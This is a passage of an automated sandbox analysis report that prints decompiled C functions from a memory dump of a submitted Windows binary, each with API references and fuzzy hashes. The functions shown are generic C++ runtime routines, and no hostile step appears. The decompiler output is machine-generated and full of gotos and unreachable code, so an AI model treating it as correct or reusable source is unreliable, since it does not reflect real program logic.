                          • Concurrency::cancel_current_task.LIBCPMT ref: 01301AD2
                          • Concurrency::cancel_current_task.LIBCPMT ref: 01301AD7
                          • Concurrency::cancel_current_task.LIBCPMT ref: 01301ADC
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: 6e778cb3e9a1c11261b68d932cbbccff99f38248bb817bf5599412ab35713f22
                          • Instruction ID: c46bd0941f3c7e1375d1de361095305dab7a13bebbd11741416f0a7b179bacf2
                          • Opcode Fuzzy Hash: 6e778cb3e9a1c11261b68d932cbbccff99f38248bb817bf5599412ab35713f22
                          • Instruction Fuzzy Hash: CA511471600205DFDB05DF68C4A0A6ABBE1FF98318B24C1ADEC4A8B391E731DD91CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E01347D6F(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                          				signed char _v5;
                          				signed int _v12;
                          				void* _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				intOrPtr* _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _t63;
                          				intOrPtr _t64;
                          				signed int _t65;
                          				intOrPtr _t69;
                          				signed int _t73;
                          				signed char _t77;
                          				signed int _t82;
                          				signed int _t90;
                          				signed int _t93;
                          				signed int _t99;
                          				signed char _t103;
                          				signed char _t108;
                          				signed int _t110;
                          				intOrPtr _t113;
                          				intOrPtr* _t115;
                          				signed int _t116;
                          
                          				_t93 = __ecx | 0xffffffff;
                          				_t63 =  *((intOrPtr*)(_a8 + 0x10));
                          				_t110 = 0;
                          				_v12 = 0;
                          				_t90 = 0;
                          				_v32 = 0;
                          				_v16 = 0;
                          				_t113 =  *((intOrPtr*)(_t63 + 0xc));
                          				_t64 =  *((intOrPtr*)(_t63 + 8));
                          				_v40 = _t113;
                          				_v36 = _t64;
                          				_v24 = 0;
                          				_v20 = _t93;
                          				_v5 = 1;
                          				_v28 = _t93;
                          				if(_t64 == 0) {
                          					L30:
                          					_t65 = 0;
                          				} else {
                          					do {
                          						_t115 =  *((intOrPtr*)(_t113 + _t90 * 4));
                          						if(_t90 - _t93 > _v24 && E01347EF6( *_t115, _a20) != 0) {
                          							if(( *(_t115 + 0x14) & 0x00000003) == 0) {
                          								_v32 = _t115;
                          							}
                          							_v16 = _t115;
                          							_v20 = _t90;
                          							_v24 =  *((intOrPtr*)(_t115 + 4));
                          						}
                          						if(E01347EF6( *_t115, _a12) == 0 || E01347ED2(_a4, _t115 + 8) != _a16) {
                          							L20:
                          							_t108 = _v5;
                          							goto L21;
                          						} else {
                          							_t108 = _v5;
                          							_t99 = _t90 - _v20;
                          							if(_t99 > _v24) {
                          								if(( *(_t115 + 0x14) & 0x00000005) != 0) {
                          									goto L21;
                          								} else {
                          									_t69 = _t115;
                          									_v12 = _t69;
                          									goto L22;
                          								}
                          								L32:
                          							} else {
                          								if(_t108 == 0) {
                          									L21:
                          									_t69 = _v12;
                          									goto L22;
                          								} else {
                          									_t73 = _v20;
                          									if(( *(_v16 + 0x14) & 0x00000040) != 0) {
                          										_t116 = _v16;
                          										_t77 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x18)) + 0xc)) + _t99 * 4)) + 0x14);
                          										_t103 =  !(_t77 >> 2) & 0x00000001;
                          										asm("sbb al, al");
                          										_t108 = _t108 &  !( ~(_t77 & 0x00000001));
                          										_v5 = _t108;
                          									} else {
                          										if(_t73 == 0) {
                          											asm("sbb al, al");
                          											_t108 = _t108 &  !( ~( *(_t115 + 0x14) & 0x00000001));
                          											_v5 = _t108;
                          										}
                          										_t116 = _v16;
                          										_t103 = 1;
                          									}
                          									if(_t108 == 0 || _t103 == 0) {
                          										goto L21;
                          									} else {
                          										_t82 = E01347ED2(_a4, _t116 + 8);
                          										if(_t110 == 0 || _v28 == _t82) {
                          											_t110 = _t116;
                          											_v28 = _t82;
                          											goto L20;
                          										} else {
                          											goto L30;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						goto L31;
                          						L22:
                          						_t93 = _v20;
                          						_t90 = _t90 + 1;
                          						_t113 = _v40;
                          					} while (_t90 < _v36);
                          					if(_t108 == 0 || _t110 == 0) {
                          						if(_t69 == 0) {
                          							goto L30;
                          						} else {
                          							_t65 = _v32;
                          							if(_t65 == 0) {
                          								goto L30;
                          							}
                          						}
                          					} else {
                          						_t65 = _t110;
                          					}
                          				}
                          				L31:
                          				return _t65;
                          				goto L32;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: EqualOffsetTypeids
                          • String ID:
                          • API String ID: 1707706676-0
                          • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                          • Instruction ID: 46f2248ccef7bda526ad9dd8ac0e025f39ddc8e7ae8fbea01847e96e8adb3b17
                          • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                          • Instruction Fuzzy Hash: A551AF3690420A9FDF21CF6CC4805EEBBF5EF05218F144A9AD995A7351D732BD89CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 32%
                          			E012F9580(signed int* __ecx, void* __eflags, intOrPtr _a4) {
                          				signed int _v8;
                          				char _v16;
                          				intOrPtr* _v20;
                          				void* __esi;
                          				signed int _t14;
                          				intOrPtr* _t17;
                          				signed int _t18;
                          				signed int _t20;
                          				signed int _t21;
                          				signed int* _t25;
                          				intOrPtr* _t29;
                          				signed int* _t30;
                          				void* _t33;
                          				intOrPtr* _t34;
                          				signed int _t35;
                          				void* _t40;
                          				void* _t41;
                          
                          				_t25 = __ecx;
                          				_push(0xffffffff);
                          				_push(0x13658e4);
                          				_push( *[fs:0x0]);
                          				_push(__ecx);
                          				_push(_t33);
                          				_t14 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t14 ^ _t38);
                          				 *[fs:0x0] =  &_v16;
                          				_t29 = __ecx;
                          				_t17 = E0132EA8A(_t33, __eflags, 0xc);
                          				_t34 = _t17;
                          				_t41 = _t40 + 4;
                          				_v20 = _t34;
                          				_v8 = 0;
                          				if(_t34 == 0) {
                          					_t34 = 0;
                          					__eflags = 0;
                          					goto L5;
                          				} else {
                          					asm("xorps xmm0, xmm0");
                          					asm("movq [esi], xmm0");
                          					 *(_t34 + 8) = 0;
                          					 *(_t34 + 4) = 0;
                          					 *(_t34 + 8) = 1;
                          					__imp__#2(_a4);
                          					 *_t34 = _t17;
                          					if(_t17 != 0) {
                          						L5:
                          						_v8 = 0xffffffff;
                          						 *_t29 = _t34;
                          						if(_t34 == 0) {
                          							goto L8;
                          						} else {
                          							 *[fs:0x0] = _v16;
                          							return _t29;
                          						}
                          					} else {
                          						if(_a4 != _t17) {
                          							E0132FAD0(0x8007000e);
                          							L8:
                          							_t18 = E0132FAD0(0x8007000e);
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							asm("int3");
                          							_push(_t25);
                          							_push(_t34);
                          							_push(_t29);
                          							_t30 = _t25;
                          							_t35 =  *_t30;
                          							__eflags = _t35;
                          							if(_t35 != 0) {
                          								asm("lock xadd [esi+0x8], eax");
                          								_t18 = (_t18 | 0xffffffff) - 1;
                          								__eflags = _t18;
                          								if(_t18 == 0) {
                          									_t20 =  *_t35;
                          									__eflags = _t20;
                          									if(_t20 != 0) {
                          										__imp__#6(_t20);
                          										 *_t35 = 0;
                          									}
                          									_t21 =  *(_t35 + 4);
                          									__eflags = _t21;
                          									if(_t21 != 0) {
                          										L0132ECE6(_t21);
                          										_t41 = _t41 + 4;
                          										 *(_t35 + 4) = 0;
                          									}
                          									_push(0xc);
                          									_t18 = E0132EABA(_t35);
                          								}
                          								 *_t30 = 0;
                          							}
                          							return _t18;
                          						} else {
                          							goto L5;
                          						}
                          					}
                          				}
                          			}




















                          APIs
                          • SysAllocString.OLEAUT32 ref: 012F95E0
                          • _com_issue_error.COMSUPP ref: 012F961C
                          • _com_issue_error.COMSUPP ref: 012F9626
                          • SysFreeString.OLEAUT32(-00000001), ref: 012F9650
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: String_com_issue_error$AllocFree
                          • String ID:
                          • API String ID: 3737277060-0
                          • Opcode ID: 587ea8e1544d08d3775d1a6eacbe35b22b8cb182abdb868c3240a4487af08298
                          • Instruction ID: 9dc2211811c405a235ee29dff020b8332bf275f36f590a6e905bc24d95ba167f
                          • Opcode Fuzzy Hash: 587ea8e1544d08d3775d1a6eacbe35b22b8cb182abdb868c3240a4487af08298
                          • Instruction Fuzzy Hash: E031C5B19107169BEB309F5DD805B56FBE8EF40B28F10463EFA1997280E7B59580CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0134A20B(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                          				intOrPtr _t14;
                          				intOrPtr _t15;
                          				intOrPtr _t17;
                          				intOrPtr _t36;
                          				intOrPtr* _t38;
                          				intOrPtr _t39;
                          
                          				_t38 = _a4;
                          				if(_t38 != 0) {
                          					__eflags =  *_t38;
                          					if( *_t38 != 0) {
                          						_t14 = E013577B7(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
                          						__eflags = _t14;
                          						if(__eflags != 0) {
                          							_t36 = _a8;
                          							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
                          							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
                          								L10:
                          								_t15 = E013577B7(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
                          								__eflags = _t15;
                          								if(__eflags != 0) {
                          									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
                          									_t17 = 0;
                          									__eflags = 0;
                          								} else {
                          									E0134B429(GetLastError());
                          									_t17 =  *((intOrPtr*)(E0134B45F(__eflags)));
                          								}
                          								L13:
                          								L14:
                          								return _t17;
                          							}
                          							_t17 = E0134A326(_t36, _t14);
                          							__eflags = _t17;
                          							if(_t17 != 0) {
                          								goto L13;
                          							}
                          							goto L10;
                          						}
                          						E0134B429(GetLastError());
                          						_t17 =  *((intOrPtr*)(E0134B45F(__eflags)));
                          						goto L14;
                          					}
                          					_t39 = _a8;
                          					__eflags =  *((intOrPtr*)(_t39 + 0xc));
                          					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                          						L5:
                          						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
                          						_t17 = 0;
                          						 *((intOrPtr*)(_t39 + 0x10)) = 0;
                          						goto L14;
                          					}
                          					_t17 = E0134A326(_t39, 1);
                          					__eflags = _t17;
                          					if(_t17 != 0) {
                          						goto L14;
                          					}
                          					goto L5;
                          				}
                          				E0134A3AB(_a8);
                          				return 0;
                          			}









                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f601a7e55cebb34d0c8569129d1b40c597575f7d3cfeeefc22b4447487645fd
                          • Instruction ID: dbfc3c8f20b1a4fa97fc1d2decbeb4e6f5febad4f8c8f2a91586c9f2540ac00a
                          • Opcode Fuzzy Hash: 9f601a7e55cebb34d0c8569129d1b40c597575f7d3cfeeefc22b4447487645fd
                          • Instruction Fuzzy Hash: EF21D87164462ABFDB21AF699C80C6BB7EDEF1026C7004624F92AD7140E733FC4097A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 26%
                          			E0130D9A0(void* __ebx, void* __edi, WCHAR* _a4) {
                          				signed int _v12;
                          				void* _v20;
                          				char _v24;
                          				void* _v28;
                          				void* _v32;
                          				void* __esi;
                          				signed int _t15;
                          				WCHAR* _t17;
                          				char* _t21;
                          				void* _t50;
                          				void* _t51;
                          				void* _t52;
                          				void* _t53;
                          				signed int _t54;
                          
                          				_t15 =  *0x13a4018; // 0x39cca9f6
                          				_v12 = _t15 ^ _t54;
                          				_t17 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				asm("movlpd [ebp-0x1c], xmm0");
                          				if(_t17[8] == 0) {
                          					L7:
                          					_pop(_t50);
                          					return E0132EA79(_v12 ^ _t54, _t50);
                          				} else {
                          					if(_t17[0xa] >= 8) {
                          						_t17 =  *_t17;
                          					}
                          					_t51 = CreateFileW(_t17, 0x80000000, 0, 0, 3, 0x80, 0);
                          					if(_t51 == 0xffffffff) {
                          						goto L7;
                          					} else {
                          						_t21 =  &_v24;
                          						asm("xorps xmm0, xmm0");
                          						asm("movq [ebp-0x14], xmm0");
                          						__imp__GetFileSizeEx(_t51, _t21);
                          						if(_t21 == 0) {
                          							CloseHandle(_t51);
                          							_pop(_t52);
                          							return E0132EA79(_v12 ^ _t54, _t52);
                          						} else {
                          							CloseHandle(_t51);
                          							_pop(_t53);
                          							return E0132EA79(_v12 ^ _t54, _t53);
                          						}
                          					}
                          				}
                          			}

















                          APIs
                          • CreateFileW.KERNEL32(013836C0,80000000,00000000,00000000,00000003,00000080,00000000,?,4C4B4A49,?), ref: 0130D9E3
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,013836C0,00000000,?,?,?,?), ref: 0130D9FD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,013836C0,00000000,?,?,?,?), ref: 0130DA0E
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,013836C0,00000000,?,?,?,?), ref: 0130DA32
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CloseFileHandle$CreateSize
                          • String ID:
                          • API String ID: 4148174661-0
                          • Opcode ID: bac27c39fbe43d499829f93972b7062a5d7a487ae5d6051503353af43bd67f14
                          • Instruction ID: f70dd3fdd295d74764ac1c39f6ccfa732eb4ec65f5d62317e351614903cfed42
                          • Opcode Fuzzy Hash: bac27c39fbe43d499829f93972b7062a5d7a487ae5d6051503353af43bd67f14
                          • Instruction Fuzzy Hash: F021AA72B002189FD720DFD9E885BAFF7F9FF59321F114226E605A7280D73069958790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E01355B37(void* __ecx) {
                          				intOrPtr _t2;
                          				signed int _t3;
                          				signed int _t13;
                          				signed int _t18;
                          				long _t21;
                          
                          				_t21 = GetLastError();
                          				_t2 =  *0x13a4200; // 0x6
                          				_t24 = _t2 - 0xffffffff;
                          				if(_t2 == 0xffffffff) {
                          					L6:
                          					_t3 = E013561F6(__eflags, _t2, 0xffffffff);
                          					__eflags = _t3;
                          					if(_t3 == 0) {
                          						goto L3;
                          					} else {
                          						_t18 = E01355C32(1, 0x364);
                          						__eflags = _t18;
                          						if(__eflags != 0) {
                          							__eflags = E013561F6(__eflags,  *0x13a4200, _t18);
                          							if(__eflags != 0) {
                          								E0135580E(_t18, 0x13ab4a8);
                          								E01355C8F(0);
                          								goto L13;
                          							} else {
                          								_t13 = 0;
                          								E013561F6(__eflags,  *0x13a4200, 0);
                          								_push(_t18);
                          								goto L9;
                          							}
                          						} else {
                          							_t13 = 0;
                          							__eflags = 0;
                          							E013561F6(0,  *0x13a4200, 0);
                          							_push(0);
                          							L9:
                          							E01355C8F();
                          							goto L4;
                          						}
                          					}
                          				} else {
                          					_t18 = E013561B7(_t24, _t2);
                          					if(_t18 == 0) {
                          						_t2 =  *0x13a4200; // 0x6
                          						goto L6;
                          					} else {
                          						if(_t18 != 0xffffffff) {
                          							L13:
                          							_t13 = _t18;
                          						} else {
                          							L3:
                          							_t13 = 0;
                          							L4:
                          							_t18 = _t13;
                          						}
                          					}
                          				}
                          				SetLastError(_t21);
                          				asm("sbb edi, edi");
                          				return  ~_t18 & _t13;
                          			}








                          APIs
                          • GetLastError.KERNEL32(?,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355B3C
                          • _free.LIBCMT ref: 01355B99
                          • _free.LIBCMT ref: 01355BCF
                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355BDA
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ErrorLast_free
                          • String ID:
                          • API String ID: 2283115069-0
                          • Opcode ID: 9d94900bdb31bd4965e7ab00fadae3804234885268f751e77ef5f9e328a92e12
                          • Instruction ID: fd96aa6091b2f32eb28b3286245e5a4b8288f37e9831cf462dfedbf2189802ae
                          • Opcode Fuzzy Hash: 9d94900bdb31bd4965e7ab00fadae3804234885268f751e77ef5f9e328a92e12
                          • Instruction Fuzzy Hash: E9116F723003066AEFE1267CBC89D77366DABD0F7DB690234FE26921C6DF609C014660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B132(void* __eflags, void* __fp0) {
                          				signed int _t83;
                          				void* _t143;
                          				signed int _t210;
                          				void* _t229;
                          				signed int _t231;
                          				signed int _t232;
                          				signed int _t233;
                          				signed int _t234;
                          				signed int _t235;
                          				signed int _t236;
                          				signed int _t237;
                          				signed int _t238;
                          				signed int _t239;
                          				signed int _t240;
                          				signed int _t241;
                          				signed int _t242;
                          				void* _t249;
                          
                          				_t253 = __fp0;
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t249 - 0x14, 0);
                          				_t236 =  *0x13aaaa8; // 0x0
                          				 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
                          				 *(_t249 - 0x10) = _t236;
                          				_t83 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa88));
                          				_t230 = _t83;
                          				if(_t83 != 0) {
                          					L5:
                          					E0131780E(_t249 - 0x14);
                          					return E0132F190(_t230, _t252);
                          				} else {
                          					_t252 = _t236;
                          					if(_t236 == 0) {
                          						_push( *((intOrPtr*)(_t249 + 8)));
                          						_push(_t249 - 0x10);
                          						__eflags = E0132B6C1(_t236, __eflags) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t249 - 0x14, 0);
                          							_t237 =  *0x13aaaac; // 0x0
                          							 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
                          							 *(_t249 - 0x10) = _t237;
                          							_t231 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa8c));
                          							__eflags = _t231;
                          							if(_t231 != 0) {
                          								L12:
                          								E0131780E(_t249 - 0x14);
                          								return E0132F190(_t231, __eflags);
                          							} else {
                          								__eflags = _t237;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t249 + 8)));
                          									_push(_t249 - 0x10);
                          									__eflags = E0132B729(_t237, __eflags) - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(8);
                          										E0132F1B6(0x1368615, __eflags);
                          										E013177B6(_t249 - 0x14, 0);
                          										_t238 =  *0x13aaab4; // 0x0
                          										 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
                          										 *(_t249 - 0x10) = _t238;
                          										_t232 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa94));
                          										__eflags = _t232;
                          										if(_t232 != 0) {
                          											L19:
                          											E0131780E(_t249 - 0x14);
                          											return E0132F190(_t232, __eflags);
                          										} else {
                          											__eflags = _t238;
                          											if(__eflags == 0) {
                          												_push( *((intOrPtr*)(_t249 + 8)));
                          												_push(_t249 - 0x10);
                          												__eflags = E0132B791(_t238, __eflags, __fp0) - 0xffffffff;
                          												if(__eflags == 0) {
                          													E012F9060();
                          													asm("int3");
                          													_push(8);
                          													E0132F1B6(0x1368615, __eflags);
                          													E013177B6(_t249 - 0x14, 0);
                          													_t239 =  *0x13aaab0; // 0x0
                          													 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
                          													 *(_t249 - 0x10) = _t239;
                          													_t233 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa90));
                          													__eflags = _t233;
                          													if(_t233 != 0) {
                          														L26:
                          														E0131780E(_t249 - 0x14);
                          														return E0132F190(_t233, __eflags);
                          													} else {
                          														__eflags = _t239;
                          														if(__eflags == 0) {
                          															_push( *((intOrPtr*)(_t249 + 8)));
                          															_push(_t249 - 0x10);
                          															__eflags = E0132B815(_t239, __eflags, __fp0) - 0xffffffff;
                          															if(__eflags == 0) {
                          																E012F9060();
                          																asm("int3");
                          																_push(8);
                          																E0132F1B6(0x1368615, __eflags);
                          																E013177B6(_t249 - 0x14, 0);
                          																_t240 =  *0x13aaab8; // 0x0
                          																 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
                          																 *(_t249 - 0x10) = _t240;
                          																_t234 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa98));
                          																__eflags = _t234;
                          																if(_t234 != 0) {
                          																	L33:
                          																	E0131780E(_t249 - 0x14);
                          																	return E0132F190(_t234, __eflags);
                          																} else {
                          																	__eflags = _t240;
                          																	if(__eflags == 0) {
                          																		_push( *((intOrPtr*)(_t249 + 8)));
                          																		_push(_t249 - 0x10);
                          																		__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          																		if(__eflags == 0) {
                          																			E012F9060();
                          																			asm("int3");
                          																			_push(8);
                          																			E0132F1B6(0x1368615, __eflags);
                          																			E013177B6(_t249 - 0x14, 0);
                          																			_t241 =  *0x13aaabc; // 0x0
                          																			 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
                          																			 *(_t249 - 0x10) = _t241;
                          																			_t235 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa9c));
                          																			__eflags = _t235;
                          																			if(_t235 != 0) {
                          																				L40:
                          																				E0131780E(_t249 - 0x14);
                          																				return E0132F190(_t235, __eflags);
                          																			} else {
                          																				__eflags = _t241;
                          																				if(__eflags == 0) {
                          																					_push( *((intOrPtr*)(_t249 + 8)));
                          																					_push(_t249 - 0x10);
                          																					_t143 = E0132B906(_t229, _t241, __eflags);
                          																					_pop(_t210);
                          																					__eflags = _t143 - 0xffffffff;
                          																					if(__eflags == 0) {
                          																						E012F9060();
                          																						asm("int3");
                          																						_push(4);
                          																						E0132F1B6(0x1368ad3, __eflags);
                          																						_t242 = _t210;
                          																						 *(_t249 - 0x10) = _t242;
                          																						 *((intOrPtr*)(_t242 + 4)) =  *((intOrPtr*)(_t249 + 0xc));
                          																						_push( *((intOrPtr*)(_t249 + 8)));
                          																						_t77 = _t249 - 4;
                          																						 *_t77 =  *(_t249 - 4) & 0x00000000;
                          																						__eflags =  *_t77;
                          																						 *_t242 = 0x1376c58;
                          																						E0132C81A(_t210, _t229, __eflags, _t253);
                          																						return E0132F190(_t242, __eflags);
                          																					} else {
                          																						_t235 =  *(_t249 - 0x10);
                          																						 *(_t249 - 0x10) = _t235;
                          																						 *(_t249 - 4) = 1;
                          																						E0131792B(__eflags, _t235);
                          																						 *0x1374358();
                          																						 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 4))))();
                          																						 *0x13aaabc = _t235;
                          																						goto L40;
                          																					}
                          																				} else {
                          																					_t235 = _t241;
                          																					goto L40;
                          																				}
                          																			}
                          																		} else {
                          																			_t234 =  *(_t249 - 0x10);
                          																			 *(_t249 - 0x10) = _t234;
                          																			 *(_t249 - 4) = 1;
                          																			E0131792B(__eflags, _t234);
                          																			 *0x1374358();
                          																			 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 4))))();
                          																			 *0x13aaab8 = _t234;
                          																			goto L33;
                          																		}
                          																	} else {
                          																		_t234 = _t240;
                          																		goto L33;
                          																	}
                          																}
                          															} else {
                          																_t233 =  *(_t249 - 0x10);
                          																 *(_t249 - 0x10) = _t233;
                          																 *(_t249 - 4) = 1;
                          																E0131792B(__eflags, _t233);
                          																 *0x1374358();
                          																 *((intOrPtr*)( *((intOrPtr*)( *_t233 + 4))))();
                          																 *0x13aaab0 = _t233;
                          																goto L26;
                          															}
                          														} else {
                          															_t233 = _t239;
                          															goto L26;
                          														}
                          													}
                          												} else {
                          													_t232 =  *(_t249 - 0x10);
                          													 *(_t249 - 0x10) = _t232;
                          													 *(_t249 - 4) = 1;
                          													E0131792B(__eflags, _t232);
                          													 *0x1374358();
                          													 *((intOrPtr*)( *((intOrPtr*)( *_t232 + 4))))();
                          													 *0x13aaab4 = _t232;
                          													goto L19;
                          												}
                          											} else {
                          												_t232 = _t238;
                          												goto L19;
                          											}
                          										}
                          									} else {
                          										_t231 =  *(_t249 - 0x10);
                          										 *(_t249 - 0x10) = _t231;
                          										 *(_t249 - 4) = 1;
                          										E0131792B(__eflags, _t231);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t231 + 4))))();
                          										 *0x13aaaac = _t231;
                          										goto L12;
                          									}
                          								} else {
                          									_t231 = _t237;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t230 =  *(_t249 - 0x10);
                          							 *(_t249 - 0x10) = _t230;
